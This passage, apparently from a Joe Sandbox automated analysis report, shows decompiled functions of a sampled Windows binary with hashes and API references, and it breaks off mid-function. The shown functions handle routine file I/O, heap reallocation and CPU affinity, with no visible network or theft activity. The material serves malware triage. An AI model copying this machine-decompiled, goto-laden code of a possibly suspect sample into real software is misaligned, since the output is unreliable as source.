                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: 3c1e94db903940de0de51f2939e3c8d0094b6a8e67061bda6c9019f8b7ebad2c
                • Instruction ID: 85c35da60d7cd4dc0a9f5bd42aa9a8b26721c9d924b78ee2efa932f0e926bedd
                • Opcode Fuzzy Hash: 3c1e94db903940de0de51f2939e3c8d0094b6a8e67061bda6c9019f8b7ebad2c
                • Instruction Fuzzy Hash: C85147F0A0024D9FDB22DF75C8816BBFBE8EF41300F28446EE6968B651D7359945CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E003D9A74(signed int __ecx, long* _a4, signed int _a8, long _a12, signed int _a20, char _a24, long _a4124, long _a4128, long _a4132) {
                				signed int _v0;
                				long* _v4;
                				intOrPtr _v8;
                				void* _t30;
                				long _t32;
                				signed int _t33;
                				void* _t35;
                				long* _t38;
                				void* _t41;
                				long _t42;
                				signed int _t46;
                				long _t50;
                				void* _t51;
                				long _t52;
                				intOrPtr* _t53;
                				void* _t57;
                				void* _t63;
                				signed int _t67;
                				signed int _t70;
                
                				E003EEC50(0x1018);
                				_t50 = _a4132;
                				_t42 = _a4128;
                				_t53 = __ecx;
                				_t52 = _a4124;
                				_v0 = __ecx;
                				if( *((intOrPtr*)(__ecx + 8)) == 0xffffffff) {
                					L21:
                					_t30 = 1;
                					L22:
                					return _t30;
                				}
                				if( *((intOrPtr*)(__ecx + 0x10)) != 1) {
                					__eflags = _t42;
                					if(__eflags > 0) {
                						L32:
                						_a12 = _t42;
                						_t32 = SetFilePointer( *(_t53 + 8), _t52,  &_a12, _t50); // executed
                						__eflags = _t32 - 0xffffffff;
                						if(_t32 != 0xffffffff) {
                							goto L21;
                						}
                						_t33 = GetLastError();
                						asm("sbb al, al");
                						_t30 =  ~_t33 + 1;
                						goto L22;
                					}
                					if(__eflags < 0) {
                						L27:
                						__eflags = _t50;
                						if(_t50 == 0) {
                							goto L32;
                						}
                						__eflags = _t50 - 1;
                						if(_t50 != 1) {
                							_t35 = E003D981A(_t50);
                						} else {
                							 *0x403278();
                							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x14))))();
                							_t53 = _v0;
                						}
                						_t52 = _t52 + _t35;
                						asm("adc ebx, edx");
                						_t50 = 0;
                						__eflags = 0;
                						goto L32;
                					}
                					__eflags = _t52;
                					if(_t52 >= 0) {
                						goto L32;
                					}
                					goto L27;
                				}
                				_t38 = __ecx + 0x28;
                				_a4 = _t38;
                				if(_t50 != 1) {
                					__eflags = _t50;
                					if(_t50 != 0) {
                						L23:
                						_t30 = 0;
                						goto L22;
                					}
                					L5:
                					_t63 = _t42 - _t38[1];
                					if(_t63 < 0 || _t63 <= 0 && _t52 <  *_t38) {
                						goto L23;
                					} else {
                						_t46 = _t42;
                						_t57 = _t52 -  *_t38;
                						asm("sbb ecx, [eax+0x4]");
                						_a8 = _t46;
                						if(_t57 != 0 || _t57 != 0) {
                							do {
                								_t67 = _t46;
                								if(_t67 > 0 || _t67 >= 0 && _t57 >= 0x1000) {
                									L14:
                									_t12 =  &_a20;
                									 *_t12 = _a20 & 0x00000000;
                									__eflags =  *_t12;
                									_t51 = 0x1000;
                									goto L15;
                								} else {
                									_t51 = _t57;
                									_a20 = _t46;
                									L15:
                									 *0x403278( &_a24, _t51);
                									_t41 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))();
                									if(_t41 <= 0) {
                										goto L23;
                									}
                									_t46 = _v0;
                									_t53 = _v8;
                									asm("cdq");
                									_t57 = _t57 - _t41;
                									asm("sbb ecx, edx");
                									_v0 = _t46;
                									_t70 = _t46;
                									if(_t70 > 0) {
                										goto L14;
                									}
                								}
                							} while (_t70 >= 0 && _t57 != 0);
                							_t38 = _v4;
                							goto L20;
                						} else {
                							L20:
                							 *_t38 = _t52;
                							_t38[1] = _t42;
                							goto L21;
                						}
                					}
                				}
                				_t52 = _t52 +  *_t38;
                				asm("adc ebx, [eax+0x4]");
                				goto L5;
                			}

                APIs
                • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,003D9A50,?,?,00000000,?,?,003D8CBC,?), ref: 003D9BAB
                • GetLastError.KERNEL32(?,00000000,003D8411,-00009570,00000000,000007F3), ref: 003D9BB6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 3d3f1dded7802d0bf86281971cf62740e497b7ca55ba1298e5a237dbf3991d7c
                • Instruction ID: 9454a1291b9f12ab29e106ab780136fcb5aaa4bb214f1de824f459a53f4f7e7a
                • Opcode Fuzzy Hash: 3d3f1dded7802d0bf86281971cf62740e497b7ca55ba1298e5a237dbf3991d7c
                • Instruction Fuzzy Hash: 3641CC726043018BDB269F29F584A6AB7E9FBD5320F178A2FE88587360D770AC448A51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E003D1E50(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
                				void* _t38;
                				intOrPtr _t47;
                				void* _t68;
                				unsigned int _t70;
                				signed int _t72;
                				intOrPtr* _t74;
                				void* _t76;
                
                				_t68 = __edx;
                				E003EEB78(0x402673, _t76);
                				_t55 = 0;
                				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
                				 *((intOrPtr*)(_t76 - 0x24)) = 0;
                				 *(_t76 - 0x20) = 0;
                				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
                				 *((intOrPtr*)(_t76 - 0x18)) = 0;
                				 *((char*)(_t76 - 0x14)) = 0;
                				_push(0);
                				_push(0);
                				 *((intOrPtr*)(_t76 - 4)) = 0;
                				_push(_t76 - 0x24);
                				_t38 = E003D3BBA(__ecx); // executed
                				if(_t38 != 0) {
                					_t70 =  *(_t76 - 0x20);
                					E003D1732(_t76 - 0x24, _t68, 1);
                					_t74 =  *((intOrPtr*)(_t76 + 8));
                					 *((char*)( *(_t76 - 0x20) +  *((intOrPtr*)(_t76 - 0x24)) - 1)) = 0;
                					_t16 = _t70 + 1; // 0x1
                					E003D18A9(_t74, _t16);
                					_t47 =  *((intOrPtr*)(_t76 - 0x10));
                					if( *((intOrPtr*)(_t47 + 0x6cc8)) != 3) {
                						if(( *(_t47 + 0x460c) & 0x00000001) == 0) {
                							E003E1B84( *((intOrPtr*)(_t76 - 0x24)),  *_t74,  *((intOrPtr*)(_t74 + 4)));
                						} else {
                							_t72 = _t70 >> 1;
                							E003E1BFD( *((intOrPtr*)(_t76 - 0x24)),  *_t74, _t72);
                							 *((short*)( *_t74 + _t72 * 2)) = 0;
                						}
                					} else {
                						_push( *((intOrPtr*)(_t74 + 4)));
                						_push( *_t74);
                						_push( *((intOrPtr*)(_t76 - 0x24)));
                						E003E1C3B();
                					}
                					E003D18A9(_t74, E003F3E13( *_t74));
                					_t55 = 1;
                				}
                				_t39 =  *((intOrPtr*)(_t76 - 0x24));
                				 *((intOrPtr*)(_t76 - 4)) = 2;
                				if( *((intOrPtr*)(_t76 - 0x24)) != 0) {
                					if( *((char*)(_t76 - 0x14)) != 0) {
                						E003DF445(_t39,  *((intOrPtr*)(_t76 - 0x1c)));
                						_t39 =  *((intOrPtr*)(_t76 - 0x24));
                					}
                					L003F3E2E(_t39);
                				}
                				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                				return _t55;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 003D1E55
                  • Part of subcall function 003D3BBA: __EH_prolog.LIBCMT ref: 003D3BBF
                • _wcslen.LIBCMT ref: 003D1EFD
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog$_wcslen
                • String ID:
                • API String ID: 2838827086-0
                • Opcode ID: db55bfe48cc4081b7ab41c0c3f3c4d2389b038715291a97cfcacb33d04bbba40
                • Instruction ID: 87914f2e012864a5fcfbd4d8d17cad96c5bc656343b296616fae6f4e0cb08bee
                • Opcode Fuzzy Hash: db55bfe48cc4081b7ab41c0c3f3c4d2389b038715291a97cfcacb33d04bbba40
                • Instruction Fuzzy Hash: 37314C72904109AFCF12DF99D945AEEBBF5BF18300F10016AE445AB351C7325E10DB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E003D9DA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
                				void* _v8;
                				void* _v16;
                				void* _v24;
                				signed char _v25;
                				signed char _v26;
                				int _t35;
                				signed char _t50;
                				signed int* _t52;
                				signed char _t58;
                				void* _t59;
                				void* _t60;
                				signed int* _t61;
                				signed int* _t63;
                
                				_t60 = __esi;
                				_t59 = __ecx;
                				if( *(__ecx + 0x20) != 0x100 && ( *(__ecx + 0x20) & 0x00000002) == 0) {
                					FlushFileBuffers( *(__ecx + 8));
                				}
                				_t52 = _a4;
                				_t50 = 1;
                				if(_t52 == 0 || ( *_t52 | _t52[1]) == 0) {
                					_t58 = 0;
                					_v25 = 0;
                				} else {
                					_t58 = 1;
                					_v25 = 1;
                				}
                				_push(_t60);
                				_t61 = _a8;
                				if(_t61 == 0) {
                					L9:
                					_v26 = 0;
                				} else {
                					_v26 = _t50;
                					if(( *_t61 | _t61[1]) == 0) {
                						goto L9;
                					}
                				}
                				_t63 = _a12;
                				if(_t63 == 0 || ( *_t63 | _a4) == 0) {
                					_t50 = 0;
                				}
                				if(_t58 != 0) {
                					E003E138A(_t52, _t58,  &_v24);
                				}
                				if(_v26 != 0) {
                					E003E138A(_t61, _t58,  &_v8);
                				}
                				if(_t50 != 0) {
                					E003E138A(_t63, _t58,  &_v16);
                				}
                				asm("sbb eax, eax");
                				asm("sbb eax, eax");
                				asm("sbb eax, eax");
                				_t35 = SetFileTime( *(_t59 + 8),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t50 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
                				return _t35;
                			}

                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003D73BC,?,?,?,00000000), ref: 003D9DBC
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 003D9E70
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: b715e7daf705af87db3c159ac896c55355d7adbb0e1c0afb20a369b0bc1cb909
                • Instruction ID: 8cd2f304da7d5796786a70b766bb3eaceb2d460d569a72dd57f9ea62c7a73ebd
                • Opcode Fuzzy Hash: b715e7daf705af87db3c159ac896c55355d7adbb0e1c0afb20a369b0bc1cb909
                • Instruction Fuzzy Hash: 2521D2322482859FC716DF35D491BABBBE8AF55304F09491FF4C587681D339D90C9B61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003D966E(void* __ecx, WCHAR* _a4100, signed char _a4104) {
                				short _v0;
                				signed int _t27;
                				void* _t29;
                				signed char _t38;
                				signed int _t42;
                				long _t45;
                				void* _t46;
                				long _t48;
                
                				E003EEC50(0x1000);
                				_t38 = _a4104;
                				_t46 = __ecx;
                				_t42 = _t38 >> 1;
                				if((_t38 & 0x00000010) != 0) {
                					L3:
                					_t48 = 1;
                					__eflags = 1;
                				} else {
                					_t52 =  *((char*)(__ecx + 0x30));
                					if( *((char*)(__ecx + 0x30)) != 0) {
                						goto L3;
                					} else {
                						_t48 = 0;
                					}
                				}
                				 *(_t46 + 0x20) = _t38;
                				_t45 = ((_t42 ^ 0x00000001) << 0x1f) + 0x40000000;
                				_t27 =  *(E003DC27E(_t52, _a4100)) & 0x0000ffff;
                				if(_t27 == 0x2e || _t27 == 0x20) {
                					if((_t38 & 0x00000020) != 0) {
                						goto L8;
                					} else {
                						_t39 = _a4100;
                						_t29 = _t27 | 0xffffffff;
                					}
                				} else {
                					L8:
                					_t39 = _a4100;
                					__eflags = 0;
                					_t29 = CreateFileW(_a4100, _t45, _t48, 0, 2, 0, 0); // executed
                				}
                				 *(_t46 + 8) = _t29;
                				if(_t29 == 0xffffffff && E003DBB03(_t39,  &_v0, 0x800) != 0) {
                					 *(_t46 + 8) = CreateFileW( &_v0, _t45, _t48, 0, 2, 0, 0);
                				}
                				 *(_t46 + 0x10) =  *(_t46 + 0x10) & 0x00000000;
                				 *((char*)(_t46 + 0x1c)) = 1;
                				 *((char*)(_t46 + 0x15)) = 0;
                				return E003E0602(_t46 + 0x32, _t39, 0x800) & 0xffffff00 |  *(_t46 + 8) != 0xffffffff;
                			}

                APIs
                • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,003D9F27,?,?,003D771A), ref: 003D96E6
                • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,003D9F27,?,?,003D771A), ref: 003D9716
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: dc1444d70a0ce12fdcf8bd2839b4110db8b8861c6011f02b3a4e38bdfc25b925
                • Instruction ID: cb7f859cf2d2ba59aeb81fd675d8d42c7a4b8075c95667353e3b5b620ca22aee
                • Opcode Fuzzy Hash: dc1444d70a0ce12fdcf8bd2839b4110db8b8861c6011f02b3a4e38bdfc25b925
                • Instruction Fuzzy Hash: 7421CFB2104344AFE3318A65DC89FA7B7DCEB49330F110A1BFA95D66D1C7B4A8848731
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E003D9E80(void* __ecx) {
                				long _v8;
                				void* __ebp;
                				long _t13;
                				long _t15;
                				signed int _t17;
                				char* _t33;
                				void* _t36;
                				long _t37;
                				void* _t39;
                
                				_push(__ecx);
                				_t36 = __ecx;
                				_t33 = __ecx + 0x1e;
                				if( *((intOrPtr*)(__ecx + 8)) != 0xffffffff) {
                					_t21 = __ecx + 0x32;
                					goto L4;
                				} else {
                					if( *_t33 == 0) {
                						L12:
                						_t17 = _t13 | 0xffffffff;
                					} else {
                						_t21 = __ecx + 0x32;
                						E003D6D5B(0x411098, _t39, __ecx + 0x32);
                						L4:
                						if( *((intOrPtr*)(_t36 + 0x10)) != 1) {
                							_v8 = _v8 & 0x00000000;
                							_t15 = SetFilePointer( *(_t36 + 8), 0,  &_v8, 1); // executed
                							_t37 = _t15;
                							if(_t37 != 0xffffffff) {
                								L10:
                								asm("cdq");
                								_t17 = 0 + _t37;
                								asm("adc edx, 0x0");
                							} else {
                								_t13 = GetLastError();
                								if(_t13 == 0) {
                									goto L10;
                								} else {
                									if( *_t33 == 0) {
                										goto L12;
                									} else {
                										E003D6D5B(0x411098, _t39, _t21);
                										goto L10;
                									}
                								}
                							}
                						} else {
                							_t17 =  *(_t36 + 0x28);
                						}
                					}
                				}
                				return _t17;
                			}

                APIs
                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 003D9EC7
                • GetLastError.KERNEL32 ref: 003D9ED4
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: c5bb69a8cabc5b36b607aed970c52d0b3a2399e348edfe8ed0c8343af498a277
                • Instruction ID: 0df0cc1eeccbeba99ee20e1d373192c565ec6c572488680d7a4b228f1a341fa7
                • Opcode Fuzzy Hash: c5bb69a8cabc5b36b607aed970c52d0b3a2399e348edfe8ed0c8343af498a277
                • Instruction Fuzzy Hash: 4F11E532600704ABD726CB28E841BA6B7EDAB45361F514A2BE562D2BE0D770ED85C760
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E003F8E54(void* __ecx, void* __edx, void* _a4, long _a8) {
                				void* _t4;
                				long _t7;
                				void* _t9;
                				void* _t13;
                				void* _t14;
                				long _t16;
                
                				_t13 = __edx;
                				_t10 = __ecx;
                				_t14 = _a4;
                				if(_t14 != 0) {
                					_t16 = _a8;
                					__eflags = _t16;
                					if(_t16 != 0) {
                						__eflags = _t16 - 0xffffffe0;
                						if(_t16 <= 0xffffffe0) {
                							while(1) {
                								_t4 = RtlReAllocateHeap( *0x4326e4, 0, _t14, _t16); // executed
                								__eflags = _t4;
                								if(_t4 != 0) {
                									break;
                								}
                								__eflags = E003F8C34();
                								if(__eflags == 0) {
                									goto L5;
                								}
                								_t7 = E003F7A5E(_t10, _t13, __eflags, _t16);
                								_pop(_t10);
                								__eflags = _t7;
                								if(_t7 == 0) {
                									goto L5;
                								}
                							}
                							L7:
                							return _t4;
                						}
                						L5:
                						 *((intOrPtr*)(E003F91A8())) = 0xc;
                						L6:
                						_t4 = 0;
                						__eflags = 0;
                						goto L7;
                					}
                					E003F8DCC(_t14);
                					goto L6;
                				}
                				_t9 = E003F8E06(__ecx, _a8); // executed
                				return _t9;
                			}

                APIs
                • _free.LIBCMT ref: 003F8E75
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00411098,003D17CE,?,?,00000007,?,?,?,003D13D6,?,00000000), ref: 003F8EB1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AllocateHeap$_free
                • String ID:
                • API String ID: 1482568997-0
                • Opcode ID: 2343919df4450c03f5d7839a9f14b99e3c278e3171937fdfc910658c13ca9d14
                • Instruction ID: 4fba7c51ce3b9a6b8070f8fcf60d64edd6f6343d309ed432df48d66b28e9d78e
                • Opcode Fuzzy Hash: 2343919df4450c03f5d7839a9f14b99e3c278e3171937fdfc910658c13ca9d14
                • Instruction Fuzzy Hash: 5DF0963260111D66DB2F6B259D05BBF775C8FB1BB0F264526FB14AA191DF70DD0181E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003E109E(void* __ecx) {
                				long _v8;
                				long _v12;
                				int _t8;
                				void* _t14;
                				signed int _t15;
                				signed int _t17;
                
                				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
                				if(_t8 != 0) {
                					_t14 = 0;
                					_t17 = _v8;
                					_t15 = 1;
                					do {
                						if((_t17 & _t15) != 0) {
                							_t14 = _t14 + 1;
                						}
                						_t15 = _t15 + _t15;
                					} while (_t15 != 0);
                					if(_t14 >= 1) {
                						return _t14;
                					}
                					return 1;
                				} else {
                					return _t8 + 1;
                				}
                			}

                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 003E10AB
                • GetProcessAffinityMask.KERNEL32 ref: 003E10B2
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 3f22ebc9c024910cab54a0eeae29b593bcaccc4cbd90bae8eff1121f68bc3934
                • Instruction ID: c761cafe56f811e534f6b19fd7fb0035f7a8716d8e8c576d2d1c0d0244650ec0
                • Opcode Fuzzy Hash: 3f22ebc9c024910cab54a0eeae29b593bcaccc4cbd90bae8eff1121f68bc3934
                • Instruction Fuzzy Hash: 72E0DF32B211A9E7CF0A8BB69C059EB77EDEA442097218279E403E3141F930EE414AA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DA4ED(WCHAR* _a4, long _a8) {
                				short _v4100;
                				int _t13;
                				signed int _t19;
                				signed int _t20;
                
                				E003EEC50(0x1000);
                				_t13 = SetFileAttributesW(_a4, _a8); // executed
                				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
                				if(_t13 == 0 && E003DBB03(_a4,  &_v4100, 0x800) != 0) {
                					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
                				}
                				return _t20;
                			}

                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA501
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA532
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AttributesFile$_wcslen
                • String ID:
                • API String ID: 2673547680-0
                • Opcode ID: 13e000a38f654b2f5fc6d7b1d22b1a61359b9a663b6801e159f04fdf8ccb4e3e
                • Instruction ID: 63717c81a4fc4e6660308e1960a275e53087efce7357e9ddbc083205f071d6b2
                • Opcode Fuzzy Hash: 13e000a38f654b2f5fc6d7b1d22b1a61359b9a663b6801e159f04fdf8ccb4e3e
                • Instruction Fuzzy Hash: 41F0E533200109BBDF026F60EC01FDA3B6DAF05385F448062B844E5264DB31CAD8DB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DA1E0(WCHAR* _a4) {
                				short _v4100;
                				int _t11;
                				signed int _t17;
                				signed int _t18;
                
                				E003EEC50(0x1000);
                				_t11 = DeleteFileW(_a4); // executed
                				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
                				if(_t11 == 0 && E003DBB03(_a4,  &_v4100, 0x800) != 0) {
                					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
                				}
                				return _t18;
                			}

                APIs
                • DeleteFileW.KERNELBASE(000000FF,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641,000000FF), ref: 003DA1F1
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641), ref: 003DA21F
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DeleteFile$_wcslen
                • String ID:
                • API String ID: 2643169976-0
                • Opcode ID: 327be7c56b20c0b10d23a15f6056a10be4fd0321aecf6449a36c7d6d8c67c620
                • Instruction ID: c46ff53b1b41db00eae7eb737fa27a293fe01516a19c148835980d72d57aed5f
                • Opcode Fuzzy Hash: 327be7c56b20c0b10d23a15f6056a10be4fd0321aecf6449a36c7d6d8c67c620
                • Instruction Fuzzy Hash: 19E0D8321402197BDB029F61ED45FD9375CAF0C3C2F484432B944E6154EB71DED4DA54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E003EAC7C(void* __ecx) {
                				intOrPtr _v16;
                				intOrPtr* _t5;
                				void* _t8;
                				void* _t13;
                				void* _t16;
                				intOrPtr _t19;
                
                				 *[fs:0x0] = _t19;
                				_t5 =  *0x418438; // 0x76e9c100
